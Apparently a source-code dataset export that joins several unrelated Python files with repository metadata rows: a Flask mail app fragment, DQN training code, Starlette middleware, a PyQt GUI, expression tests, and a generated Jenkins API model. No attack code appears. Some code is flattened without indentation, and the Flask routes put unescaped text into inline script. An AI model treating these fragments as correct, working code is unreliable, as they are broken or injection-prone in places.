empty_sent(x.replace("/", ''))
c = db.sent.find("sent", "all")
message = []
for x in c:
message.append(x)
message.reverse()
return render_template("sent.html", messages=message, num=str(len(check())), addr=addr)
except:
return "<script>alert('You have not sent any messages yet.');window.location = '/';</script>"
@app.route("/read/<id>")
def read_(id):
data = read.read(id, addr).split("\n")
id = data[2]
time = data[3]
title = data[4]
from_ = data[5]
message = ' '.join(data[7:])
num = check()
to_ = title.split()[1]
title_ = from_.split()[1]
return render_template("read.html", title_=title_, to_=to_, num=str(len(num)), id=id, time=time, from_=from_, message=message, title=title, addr=addr)
@app.route("/addressbook/", methods=['GET', 'POST'])
def addressbook_():
if request.method == "POST":
name = request.form['name']
address = request.form['addr']
addressbook.add_entry(name, address)
delete = request.form.getlist("delete")
if delete:
for x in delete:
address_delete(x)
return redirect("/addressbook/")
try:
addr_ = []
addresses = addressbook.addresses().replace("\t", '').split("\n")
for x in addresses:
try:
if x != '':
x = x.split()
name = x[0]
addre = x[1]
addr_.append({"name":name, "addr":addre})
except IndexError:
continue
addresses = addr_
return render_template("addressbook.html", addresses=addresses, num=str(len(check())), addr=addr)
except Exception, error:
return render_template("addressbook.html", num=str(len(check())), addr=addr)
@app.route("/reply/<to>/<title>/", methods=['GET', 'POST'])
def reply(to, title):
num = check()
if request.method == 'POST':
to = request.form['to']
if len(to) != 32:
check_ = db.addressdb.find("addresses", "all")
for x in check_:
for y in x:
if y == to:
to = x[y]
title = request.form['title']
msg = request.form['message']
check_ = message.send_msg(msg, title, to, addr)
check_ = """<script>alert("{0}");window.location = '/';</script>""".format(check_)
return check_
return render_template("reply.html", title=title, to=to, addr=addr, num=str(len(num)))
def address_delete(name):
addressbook.remove_address(name)
@app.route("/send/", methods=['GET', 'POST'])
def send():
num = check()
if request.method == 'POST':
to = request.form['to'].replace(" ", '')
if "," in to:
t = to.split(",")
else:
t = []
t.append(to)
for to in t:
if len(to) != 32:
check_ = db.addressdb.find("addresses", "all")
for x in check_:
for y in x:
if y == to:
to = x[y]
title = request.form['title']
msg = request.form['message']
check_ = message.send_msg(msg, title, to, addr)
check_ = """<script>alert("{0}");window.location = '/';</script>""".format(check_)
return check_
return render_template("send.html", addr=addr, num=str(len(num)))
def delete_(id):
check = delete.send_delete(id, addr)
def run():
global addr
addr = db.data.find("data", "all")[0]['addr']
app.run(port=5334, debug=False)
if __name__ == "__main__":
app.run(debug=True, port=5044)
| 3,951 | 0 | 252 |
b331dfbb5fb50ffa7069ef01c5dd5fd6c434574e | 4,413 | py | Python | alexander/dqn/func_q_learning.py | Fiona55/hiv_experiment | de79d5bac3499025e1a7e2d456810490c6ecb4e9 | [
"MIT"
] | null | null | null | alexander/dqn/func_q_learning.py | Fiona55/hiv_experiment | de79d5bac3499025e1a7e2d456810490c6ecb4e9 | [
"MIT"
] | null | null | null | alexander/dqn/func_q_learning.py | Fiona55/hiv_experiment | de79d5bac3499025e1a7e2d456810490c6ecb4e9 | [
"MIT"
] | 3 | 2022-03-14T15:27:46.000Z | 2022-03-22T13:00:44.000Z | import math
from typing import Callable, Tuple
import numpy as np
import torch
import torch.nn as nn
from loguru import logger
from tqdm import tqdm
from alexander.dqn.buffer import ReplayBuffer
from alexander.dqn.hiv_patient import HIVPatient
from alexander.dqn.q_agent import Agent
from dataclasses import dataclass
@dataclass
@dataclass
| 24.653631 | 88 | 0.628144 | import math
from typing import Callable, Tuple
import numpy as np
import torch
import torch.nn as nn
from loguru import logger
from tqdm import tqdm
from alexander.dqn.buffer import ReplayBuffer
from alexander.dqn.hiv_patient import HIVPatient
from alexander.dqn.q_agent import Agent
from dataclasses import dataclass
class DQN(nn.Module):
def __init__(self, obs_size: int, action_size: int, hidden_size: int = 128) -> None:
super().__init__()
self.net = nn.Sequential(
nn.Linear(obs_size, hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, action_size),
)
def forward(self, x):
return self.net(x.float())
@dataclass
class Epsilon:
max: float
min: float
delay: int
@dataclass
class QLearningCongfig:
gamma: float
batch_size: int
learning_rate: float
num_episodes: int
steps_per_episode: int
target_update_rate: int
def anneal_cos(start, end, pct):
cos_out = math.cos(math.pi * pct) + 1
return end + (start - end) / 2.0 * cos_out
def anneal_linear(start, end, pct):
return (end - start) * pct + start
def loss_dqn(
batch: Tuple[np.array, ...],
gamma: float,
loss_fn: Callable,
policy_net: nn.Module,
target_net: nn.Module,
) -> torch.Tensor:
states, actions, rewards, dones, next_states = batch
state_batch = torch.tensor(states)
action_batch = torch.tensor(actions).unsqueeze(-1)
reward_batch = torch.tensor(rewards)
next_state_batch = torch.tensor(next_states)
state_action_values = policy_net(state_batch).gather(1, action_batch)
state_action_values = state_action_values.squeeze(-1)
with torch.no_grad():
next_state_values, _ = torch.max(target_net(next_state_batch), dim=1)
next_state_values[dones] = 0.0
next_state_values = next_state_values.detach()
exp_state_action_values = next_state_values * gamma + reward_batch
return loss_fn(state_action_values, exp_state_action_values)
def gradient_step_dqn(
memory: ReplayBuffer,
batch_size: int,
optimizer: torch.optim.Optimizer,
gamma: float,
policy_net: nn.Module,
target_net: nn.Module,
loss_fn: Callable,
) -> torch.Tensor:
if len(memory) < batch_size:
return
batch = memory.sample(batch_size)
loss = loss_dqn(
batch=batch,
gamma=gamma,
loss_fn=loss_fn,
policy_net=policy_net,
target_net=target_net,
)
# Optimize the model
optimizer.zero_grad()
loss.backward()
for param in policy_net.parameters():
param.grad.data.clamp_(-1, 1)
optimizer.step()
return loss
def train_dqn(
memory: ReplayBuffer,
agent: Agent,
policy_net: nn.Module,
target_net: nn.Module,
q_conf: QLearningCongfig,
eps_conf: Epsilon,
):
optimizer = torch.optim.Adam(
params=policy_net.parameters(),
lr=q_conf.learning_rate,
)
loss_fn = nn.SmoothL1Loss()
episode_rewards = []
losses = []
epsilons = []
global_step = 0
epsilon = eps_conf.max
for episode in tqdm(range(q_conf.num_episodes), unit="episode"):
episode_reward = 0
if global_step > eps_conf.delay:
epsilon = anneal_cos(
eps_conf.max,
eps_conf.min,
episode / q_conf.num_episodes,
)
for _ in range(q_conf.steps_per_episode):
if global_step % q_conf.target_update_rate == 0:
target_net.load_state_dict(policy_net.state_dict())
reward, done = agent.play_step(policy_net, epsilon, memory)
episode_reward += reward
loss = gradient_step_dqn(
memory=memory,
batch_size=q_conf.batch_size,
optimizer=optimizer,
gamma=q_conf.gamma,
policy_net=policy_net,
target_net=target_net,
loss_fn=loss_fn,
)
losses.append(loss.item())
epsilons.append(epsilon)
global_step += 1
if done:
break
episode_rewards.append(episode_reward)
# logger.info(
# f"episode = {episode}, "
# f"reward = {episode_reward}, "
# f"average loss = {np.mean(episode_losses)}"
# )
return episode_rewards, losses, epsilons
| 3,647 | 179 | 235 |
f5b0982742c773408ad195e5c023ad2c6967a669 | 426 | py | Python | kami/middleware/pages.py | Nearata/kami | 6d3989de787a54bb896f6cc869cce84aeae7cac5 | [
"Unlicense"
] | null | null | null | kami/middleware/pages.py | Nearata/kami | 6d3989de787a54bb896f6cc869cce84aeae7cac5 | [
"Unlicense"
] | 7 | 2021-02-27T22:25:14.000Z | 2021-03-04T16:41:55.000Z | kami/middleware/pages.py | Nearata/kami | 6d3989de787a54bb896f6cc869cce84aeae7cac5 | [
"Unlicense"
] | null | null | null | from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from kami.database import Pages
| 32.769231 | 95 | 0.800469 | from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from kami.database import Pages
class PagesMiddleware(BaseHTTPMiddleware):
async def dispatch(self, request: Request, call_next: RequestResponseEndpoint) -> Response:
request.app.state.pages = Pages.select()
return await call_next(request)
| 160 | 21 | 49 |
883d362ff7bd311b837cd50bd2844900ea38d650 | 1,947 | py | Python | src/gui_statistics_calculation.py | ukasofisosaari/hp_tilasto_tyokalu | a70349318cf6346caaa5ec90447770200568b026 | [
"MIT"
] | 1 | 2017-06-08T07:03:46.000Z | 2017-06-08T07:03:46.000Z | src/gui_statistics_calculation.py | ukasofisosaari/hp_tilasto_tyokalu | a70349318cf6346caaa5ec90447770200568b026 | [
"MIT"
] | 4 | 2017-10-07T10:57:11.000Z | 2017-10-07T11:01:43.000Z | src/gui_statistics_calculation.py | ukasofisosaari/kuksa_tilastotyokalu | a70349318cf6346caaa5ec90447770200568b026 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
""" Module for statistics calculation side of the ui"""
from PyQt5.QtWidgets import QVBoxLayout, QWidget, QLabel, QPushButton, QFileDialog
class GUIStatisticsCalculation(QWidget):
""" Right side of UI, ie. the statistics calculation settings and parameters."""
def calculator_selected(self, calculator_params, calculator_name, calculator_desc):
""" when calculator has been selected, this willc reate ui for for the calculation side """
while self._main_layout.count() > 0:
self._main_layout.itemAt(0).widget().setParent(None)
title = QLabel(calculator_name)
self._main_layout.addWidget(title)
desc = QLabel(calculator_desc)
self._main_layout.addWidget(desc)
self._load_file_btn = QPushButton("Lataa excel tiedosto")
self._load_file_btn.clicked.connect(self._load_file)
self._main_layout.addWidget(self._load_file_btn)
self.calculate_btn = QPushButton("Laske tilasto")
self.calculate_btn.setEnabled(False)
self._main_layout.addWidget(self.calculate_btn)
def _load_file(self):
"""Method that is called when load file button is pushed"""
self._excel_file_name = QFileDialog.getOpenFileName()[0]
print(self._excel_file_name)
filename = QLabel(self._excel_file_name)
self._main_layout.addWidget(filename)
self.calculate_btn.setEnabled(True)
def get_excel_file(self):
""" Method for returning selected excel"""
return self._excel_file_name
| 38.176471 | 99 | 0.694915 | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
""" Module for statistics calculation side of the ui"""
from PyQt5.QtWidgets import QVBoxLayout, QWidget, QLabel, QPushButton, QFileDialog
class GUIStatisticsCalculation(QWidget):
""" Right side of UI, ie. the statistics calculation settings and parameters."""
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self._main_layout = QVBoxLayout()
self._label = QLabel("Valitse tilastolaskin")
self._main_layout.addWidget(self._label)
self.setLayout(self._main_layout)
self._load_file_btn = None
self.calculate_btn = None
self._excel_file_name = ""
def calculator_selected(self, calculator_params, calculator_name, calculator_desc):
""" when calculator has been selected, this willc reate ui for for the calculation side """
while self._main_layout.count() > 0:
self._main_layout.itemAt(0).widget().setParent(None)
title = QLabel(calculator_name)
self._main_layout.addWidget(title)
desc = QLabel(calculator_desc)
self._main_layout.addWidget(desc)
self._load_file_btn = QPushButton("Lataa excel tiedosto")
self._load_file_btn.clicked.connect(self._load_file)
self._main_layout.addWidget(self._load_file_btn)
self.calculate_btn = QPushButton("Laske tilasto")
self.calculate_btn.setEnabled(False)
self._main_layout.addWidget(self.calculate_btn)
def _load_file(self):
"""Method that is called when load file button is pushed"""
self._excel_file_name = QFileDialog.getOpenFileName()[0]
print(self._excel_file_name)
filename = QLabel(self._excel_file_name)
self._main_layout.addWidget(filename)
self.calculate_btn.setEnabled(True)
def get_excel_file(self):
""" Method for returning selected excel"""
return self._excel_file_name
| 342 | 0 | 26 |
e840581a87d65f87fdd176a53421dd03dd43e00f | 4,472 | py | Python | tests/test_expressions.py | bundocka/fast-carpenter | fa90ba6fb28a73c5de4be53daebc7af9889f2478 | [
"Apache-2.0"
] | null | null | null | tests/test_expressions.py | bundocka/fast-carpenter | fa90ba6fb28a73c5de4be53daebc7af9889f2478 | [
"Apache-2.0"
] | null | null | null | tests/test_expressions.py | bundocka/fast-carpenter | fa90ba6fb28a73c5de4be53daebc7af9889f2478 | [
"Apache-2.0"
] | null | null | null | import pytest
import numpy as np
from awkward import JaggedArray
from fast_carpenter import expressions
@pytest.mark.parametrize('input, expected', [
("Muon.Px > 30", ("Muon__DOT__Px > 30", {'Muon__DOT__Px': 'Muon.Px'})),
("events.Muon.Px > 30", ("events__DOT__Muon__DOT__Px > 30",
{'events__DOT__Muon__DOT__Px': 'events.Muon.Px'})),
('l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et > 50',
('l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et > 50',
{'l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et':
'l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et'}))
])
| 38.222222 | 86 | 0.679785 | import pytest
import numpy as np
from awkward import JaggedArray
from fast_carpenter import expressions
def test_get_branches(infile):
valid = infile.allkeys()
cut = "NMuon > 1"
branches = expressions.get_branches(cut, valid)
assert branches == ["NMuon"]
cut = "NMuon_not_found > 1 and NElectron > 3"
branches = expressions.get_branches(cut, valid)
assert branches == ["NElectron"]
def test_evaluate(wrapped_tree):
Muon_py, Muon_pz = wrapped_tree.arrays(["Muon_Py", "Muon_Pz"], outputtype=tuple)
mu_pt = expressions.evaluate(wrapped_tree, "sqrt(Muon_Px**2 + Muon_Py**2)")
assert len(mu_pt) == 100
assert all(mu_pt.counts == Muon_py.counts)
def test_evaulate_matches_array(wrapped_tree):
mu_px_array = wrapped_tree.array("Muon_Px") < 0.3
mu_px_evalu = expressions.evaluate(wrapped_tree, "Muon_Px < 0.3")
assert (mu_px_evalu == mu_px_array).all().all()
def test_evaluate_bool(full_wrapped_tree):
all_true = expressions.evaluate(full_wrapped_tree, "Muon_Px == Muon_Px")
assert all(all_true.all())
mu_cut = expressions.evaluate(full_wrapped_tree, "NMuon > 1")
ele_cut = expressions.evaluate(full_wrapped_tree, "NElectron > 1")
jet_cut = expressions.evaluate(full_wrapped_tree, "NJet > 1")
mu_px = expressions.evaluate(full_wrapped_tree, "Muon_Px > 0.3")
mu_px = mu_px.pad(2)[:, 1]
combined = mu_cut & (ele_cut | jet_cut) & mu_px
assert np.count_nonzero(combined) == 2
def test_evaluate_dot(wrapped_tree):
wrapped_tree.new_variable("Muon.Px", wrapped_tree.array("Muon_Px"))
all_true = expressions.evaluate(wrapped_tree, "Muon.Px == Muon_Px")
assert all(all_true.all())
def test_constants(infile):
nan_1_or_fewer_mu = expressions.evaluate(infile, "where(NMuon > 1, NMuon, nan)")
assert np.count_nonzero(~np.isnan(nan_1_or_fewer_mu)) == 289
ninf_1_or_fewer_mu = expressions.evaluate(infile, "where(NMuon > 1, NMuon, -inf)")
assert np.count_nonzero(np.isfinite(ninf_1_or_fewer_mu)) == 289
def test_3D_jagged(wrapped_tree):
fake_3d = [[np.arange(i + 1) + j
for i in range(j % 3)]
for j in range(len(wrapped_tree))]
fake_3d = JaggedArray.fromiter(fake_3d)
wrapped_tree.new_variable("Fake3D", fake_3d)
assert isinstance(fake_3d.count(), JaggedArray)
assert all((fake_3d.copy().count() == fake_3d.count()).all())
aliased = expressions.evaluate(wrapped_tree, "Fake3D")
assert (aliased == fake_3d).all().all().all()
doubled = expressions.evaluate(wrapped_tree, "Fake3D * 2")
assert (doubled == fake_3d * 2).all().all().all()
assert len(doubled[0, :, :]) == 0
assert doubled[1, 0, :] == [2]
assert doubled[2, 0, :] == [4]
assert all(doubled[2, 1, :] == [4, 6])
doubled = expressions.evaluate(wrapped_tree, "Fake3D + Fake3D")
assert (doubled == fake_3d * 2).all().all().all()
assert len(doubled[0, :, :]) == 0
assert doubled[1, 0, :] == [2]
assert doubled[2, 0, :] == [4]
assert all(doubled[2, 1, :] == [4, 6])
fake_3d_2 = [[np.arange(i + 3) + j
for i in range(j % 2)]
for j in range(len(wrapped_tree))]
fake_3d_2 = JaggedArray.fromiter(fake_3d_2)
wrapped_tree.new_variable("SecondFake3D", fake_3d_2)
with pytest.raises(ValueError) as e:
expressions.evaluate(wrapped_tree, "SecondFake3D + Fake3D")
assert "Cannot broadcast" in str(e)
@pytest.mark.parametrize('input, expected', [
("Muon.Px > 30", ("Muon__DOT__Px > 30", {'Muon__DOT__Px': 'Muon.Px'})),
("events.Muon.Px > 30", ("events__DOT__Muon__DOT__Px > 30",
{'events__DOT__Muon__DOT__Px': 'events.Muon.Px'})),
('l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et > 50',
('l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et > 50',
{'l1CaloTowerTree__DOT__L1CaloTowerTree__DOT__L1CaloTower__DOT__et':
'l1CaloTowerTree.L1CaloTowerTree.L1CaloTower.et'}))
])
def test_preprocess_expression(input, expected):
# note: maybe hypothesis.strategies.from_regex is better than parametrize
clean_expr, alias_dict = expressions.preprocess_expression(input)
assert clean_expr == expected[0]
assert alias_dict == expected[1]
def test_broadcast(wrapped_tree):
expressions.evaluate(wrapped_tree, "NJet * Jet_Py + NElectron * Jet_Px")
with pytest.raises(ValueError):
expressions.evaluate(wrapped_tree, "Jet_Py + Muon_Px")
| 3,597 | 0 | 206 |
2caecc06a26095213805a7eb2eeab68c1980239d | 1,001 | py | Python | syne_tune/__init__.py | hfurkanbozkurt/syne-tune | 05ee2668f0155b40c3ee3b61e4b3d58f3f9f3c4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | syne_tune/__init__.py | hfurkanbozkurt/syne-tune | 05ee2668f0155b40c3ee3b61e4b3d58f3f9f3c4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | syne_tune/__init__.py | hfurkanbozkurt/syne-tune | 05ee2668f0155b40c3ee3b61e4b3d58f3f9f3c4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
try:
__all__ = ['StoppingCriterion', 'Tuner', 'Reporter']
from pathlib import Path
from syne_tune.stopping_criterion import StoppingCriterion
from syne_tune.report import Reporter
from syne_tune.tuner import Tuner
except ImportError:
pass
__version__ = read_version()
| 33.366667 | 75 | 0.73027 | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
try:
__all__ = ['StoppingCriterion', 'Tuner', 'Reporter']
from pathlib import Path
from syne_tune.stopping_criterion import StoppingCriterion
from syne_tune.report import Reporter
from syne_tune.tuner import Tuner
except ImportError:
pass
def read_version():
with open(Path(__file__).parent / "version.py", "r") as f:
return f.readline().replace("\"", "")
__version__ = read_version()
| 107 | 0 | 23 |
0a647ce0725e038910f5e586bc9cad57b2a1591d | 23,153 | py | Python | clients/python-flask/generated/openapi_server/models/free_style_project.py | cliffano/jenkins-api-clients-generator | 522d02b3a130a29471df5ec1d3d22c822b3d0813 | [
"MIT"
] | null | null | null | clients/python-flask/generated/openapi_server/models/free_style_project.py | cliffano/jenkins-api-clients-generator | 522d02b3a130a29471df5ec1d3d22c822b3d0813 | [
"MIT"
] | null | null | null | clients/python-flask/generated/openapi_server/models/free_style_project.py | cliffano/jenkins-api-clients-generator | 522d02b3a130a29471df5ec1d3d22c822b3d0813 | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.free_style_build import FreeStyleBuild
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport
from openapi_server.models.null_scm import NullSCM
from openapi_server import util
from openapi_server.models.free_style_build import FreeStyleBuild # noqa: E501
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions # noqa: E501
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport # noqa: E501
from openapi_server.models.null_scm import NullSCM # noqa: E501
class FreeStyleProject(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, _class=None, name=None, url=None, color=None, actions=None, description=None, display_name=None, display_name_or_null=None, full_display_name=None, full_name=None, buildable=None, builds=None, first_build=None, health_report=None, in_queue=None, keep_dependencies=None, last_build=None, last_completed_build=None, last_failed_build=None, last_stable_build=None, last_successful_build=None, last_unstable_build=None, last_unsuccessful_build=None, next_build_number=None, queue_item=None, concurrent_build=None, scm=None): # noqa: E501
"""FreeStyleProject - a model defined in OpenAPI
:param _class: The _class of this FreeStyleProject. # noqa: E501
:type _class: str
:param name: The name of this FreeStyleProject. # noqa: E501
:type name: str
:param url: The url of this FreeStyleProject. # noqa: E501
:type url: str
:param color: The color of this FreeStyleProject. # noqa: E501
:type color: str
:param actions: The actions of this FreeStyleProject. # noqa: E501
:type actions: List[FreeStyleProjectactions]
:param description: The description of this FreeStyleProject. # noqa: E501
:type description: str
:param display_name: The display_name of this FreeStyleProject. # noqa: E501
:type display_name: str
:param display_name_or_null: The display_name_or_null of this FreeStyleProject. # noqa: E501
:type display_name_or_null: str
:param full_display_name: The full_display_name of this FreeStyleProject. # noqa: E501
:type full_display_name: str
:param full_name: The full_name of this FreeStyleProject. # noqa: E501
:type full_name: str
:param buildable: The buildable of this FreeStyleProject. # noqa: E501
:type buildable: bool
:param builds: The builds of this FreeStyleProject. # noqa: E501
:type builds: List[FreeStyleBuild]
:param first_build: The first_build of this FreeStyleProject. # noqa: E501
:type first_build: FreeStyleBuild
:param health_report: The health_report of this FreeStyleProject. # noqa: E501
:type health_report: List[FreeStyleProjecthealthReport]
:param in_queue: The in_queue of this FreeStyleProject. # noqa: E501
:type in_queue: bool
:param keep_dependencies: The keep_dependencies of this FreeStyleProject. # noqa: E501
:type keep_dependencies: bool
:param last_build: The last_build of this FreeStyleProject. # noqa: E501
:type last_build: FreeStyleBuild
:param last_completed_build: The last_completed_build of this FreeStyleProject. # noqa: E501
:type last_completed_build: FreeStyleBuild
:param last_failed_build: The last_failed_build of this FreeStyleProject. # noqa: E501
:type last_failed_build: str
:param last_stable_build: The last_stable_build of this FreeStyleProject. # noqa: E501
:type last_stable_build: FreeStyleBuild
:param last_successful_build: The last_successful_build of this FreeStyleProject. # noqa: E501
:type last_successful_build: FreeStyleBuild
:param last_unstable_build: The last_unstable_build of this FreeStyleProject. # noqa: E501
:type last_unstable_build: str
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject. # noqa: E501
:type last_unsuccessful_build: str
:param next_build_number: The next_build_number of this FreeStyleProject. # noqa: E501
:type next_build_number: int
:param queue_item: The queue_item of this FreeStyleProject. # noqa: E501
:type queue_item: str
:param concurrent_build: The concurrent_build of this FreeStyleProject. # noqa: E501
:type concurrent_build: bool
:param scm: The scm of this FreeStyleProject. # noqa: E501
:type scm: NullSCM
"""
self.openapi_types = {
'_class': str,
'name': str,
'url': str,
'color': str,
'actions': List[FreeStyleProjectactions],
'description': str,
'display_name': str,
'display_name_or_null': str,
'full_display_name': str,
'full_name': str,
'buildable': bool,
'builds': List[FreeStyleBuild],
'first_build': FreeStyleBuild,
'health_report': List[FreeStyleProjecthealthReport],
'in_queue': bool,
'keep_dependencies': bool,
'last_build': FreeStyleBuild,
'last_completed_build': FreeStyleBuild,
'last_failed_build': str,
'last_stable_build': FreeStyleBuild,
'last_successful_build': FreeStyleBuild,
'last_unstable_build': str,
'last_unsuccessful_build': str,
'next_build_number': int,
'queue_item': str,
'concurrent_build': bool,
'scm': NullSCM
}
self.attribute_map = {
'_class': '_class',
'name': 'name',
'url': 'url',
'color': 'color',
'actions': 'actions',
'description': 'description',
'display_name': 'displayName',
'display_name_or_null': 'displayNameOrNull',
'full_display_name': 'fullDisplayName',
'full_name': 'fullName',
'buildable': 'buildable',
'builds': 'builds',
'first_build': 'firstBuild',
'health_report': 'healthReport',
'in_queue': 'inQueue',
'keep_dependencies': 'keepDependencies',
'last_build': 'lastBuild',
'last_completed_build': 'lastCompletedBuild',
'last_failed_build': 'lastFailedBuild',
'last_stable_build': 'lastStableBuild',
'last_successful_build': 'lastSuccessfulBuild',
'last_unstable_build': 'lastUnstableBuild',
'last_unsuccessful_build': 'lastUnsuccessfulBuild',
'next_build_number': 'nextBuildNumber',
'queue_item': 'queueItem',
'concurrent_build': 'concurrentBuild',
'scm': 'scm'
}
self.__class = _class
self._name = name
self._url = url
self._color = color
self._actions = actions
self._description = description
self._display_name = display_name
self._display_name_or_null = display_name_or_null
self._full_display_name = full_display_name
self._full_name = full_name
self._buildable = buildable
self._builds = builds
self._first_build = first_build
self._health_report = health_report
self._in_queue = in_queue
self._keep_dependencies = keep_dependencies
self._last_build = last_build
self._last_completed_build = last_completed_build
self._last_failed_build = last_failed_build
self._last_stable_build = last_stable_build
self._last_successful_build = last_successful_build
self._last_unstable_build = last_unstable_build
self._last_unsuccessful_build = last_unsuccessful_build
self._next_build_number = next_build_number
self._queue_item = queue_item
self._concurrent_build = concurrent_build
self._scm = scm
@classmethod
def from_dict(cls, dikt) -> 'FreeStyleProject':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The FreeStyleProject of this FreeStyleProject. # noqa: E501
:rtype: FreeStyleProject
"""
return util.deserialize_model(dikt, cls)
@property
def _class(self):
"""Gets the _class of this FreeStyleProject.
:return: The _class of this FreeStyleProject.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class):
"""Sets the _class of this FreeStyleProject.
:param _class: The _class of this FreeStyleProject.
:type _class: str
"""
self.__class = _class
@property
def name(self):
"""Gets the name of this FreeStyleProject.
:return: The name of this FreeStyleProject.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this FreeStyleProject.
:param name: The name of this FreeStyleProject.
:type name: str
"""
self._name = name
@property
def url(self):
"""Gets the url of this FreeStyleProject.
:return: The url of this FreeStyleProject.
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this FreeStyleProject.
:param url: The url of this FreeStyleProject.
:type url: str
"""
self._url = url
@property
def color(self):
"""Gets the color of this FreeStyleProject.
:return: The color of this FreeStyleProject.
:rtype: str
"""
return self._color
@color.setter
def color(self, color):
"""Sets the color of this FreeStyleProject.
:param color: The color of this FreeStyleProject.
:type color: str
"""
self._color = color
@property
def actions(self):
"""Gets the actions of this FreeStyleProject.
:return: The actions of this FreeStyleProject.
:rtype: List[FreeStyleProjectactions]
"""
return self._actions
@actions.setter
def actions(self, actions):
"""Sets the actions of this FreeStyleProject.
:param actions: The actions of this FreeStyleProject.
:type actions: List[FreeStyleProjectactions]
"""
self._actions = actions
@property
def description(self):
"""Gets the description of this FreeStyleProject.
:return: The description of this FreeStyleProject.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this FreeStyleProject.
:param description: The description of this FreeStyleProject.
:type description: str
"""
self._description = description
@property
def display_name(self):
"""Gets the display_name of this FreeStyleProject.
:return: The display_name of this FreeStyleProject.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this FreeStyleProject.
:param display_name: The display_name of this FreeStyleProject.
:type display_name: str
"""
self._display_name = display_name
@property
def display_name_or_null(self):
"""Gets the display_name_or_null of this FreeStyleProject.
:return: The display_name_or_null of this FreeStyleProject.
:rtype: str
"""
return self._display_name_or_null
@display_name_or_null.setter
def display_name_or_null(self, display_name_or_null):
"""Sets the display_name_or_null of this FreeStyleProject.
:param display_name_or_null: The display_name_or_null of this FreeStyleProject.
:type display_name_or_null: str
"""
self._display_name_or_null = display_name_or_null
@property
def full_display_name(self):
"""Gets the full_display_name of this FreeStyleProject.
:return: The full_display_name of this FreeStyleProject.
:rtype: str
"""
return self._full_display_name
@full_display_name.setter
def full_display_name(self, full_display_name):
"""Sets the full_display_name of this FreeStyleProject.
:param full_display_name: The full_display_name of this FreeStyleProject.
:type full_display_name: str
"""
self._full_display_name = full_display_name
@property
def full_name(self):
"""Gets the full_name of this FreeStyleProject.
:return: The full_name of this FreeStyleProject.
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this FreeStyleProject.
:param full_name: The full_name of this FreeStyleProject.
:type full_name: str
"""
self._full_name = full_name
@property
def buildable(self):
"""Gets the buildable of this FreeStyleProject.
:return: The buildable of this FreeStyleProject.
:rtype: bool
"""
return self._buildable
@buildable.setter
def buildable(self, buildable):
"""Sets the buildable of this FreeStyleProject.
:param buildable: The buildable of this FreeStyleProject.
:type buildable: bool
"""
self._buildable = buildable
@property
def builds(self):
"""Gets the builds of this FreeStyleProject.
:return: The builds of this FreeStyleProject.
:rtype: List[FreeStyleBuild]
"""
return self._builds
@builds.setter
def builds(self, builds):
"""Sets the builds of this FreeStyleProject.
:param builds: The builds of this FreeStyleProject.
:type builds: List[FreeStyleBuild]
"""
self._builds = builds
@property
def first_build(self):
"""Gets the first_build of this FreeStyleProject.
:return: The first_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._first_build
@first_build.setter
def first_build(self, first_build):
"""Sets the first_build of this FreeStyleProject.
:param first_build: The first_build of this FreeStyleProject.
:type first_build: FreeStyleBuild
"""
self._first_build = first_build
@property
def health_report(self):
"""Gets the health_report of this FreeStyleProject.
:return: The health_report of this FreeStyleProject.
:rtype: List[FreeStyleProjecthealthReport]
"""
return self._health_report
@health_report.setter
def health_report(self, health_report):
"""Sets the health_report of this FreeStyleProject.
:param health_report: The health_report of this FreeStyleProject.
:type health_report: List[FreeStyleProjecthealthReport]
"""
self._health_report = health_report
@property
def in_queue(self):
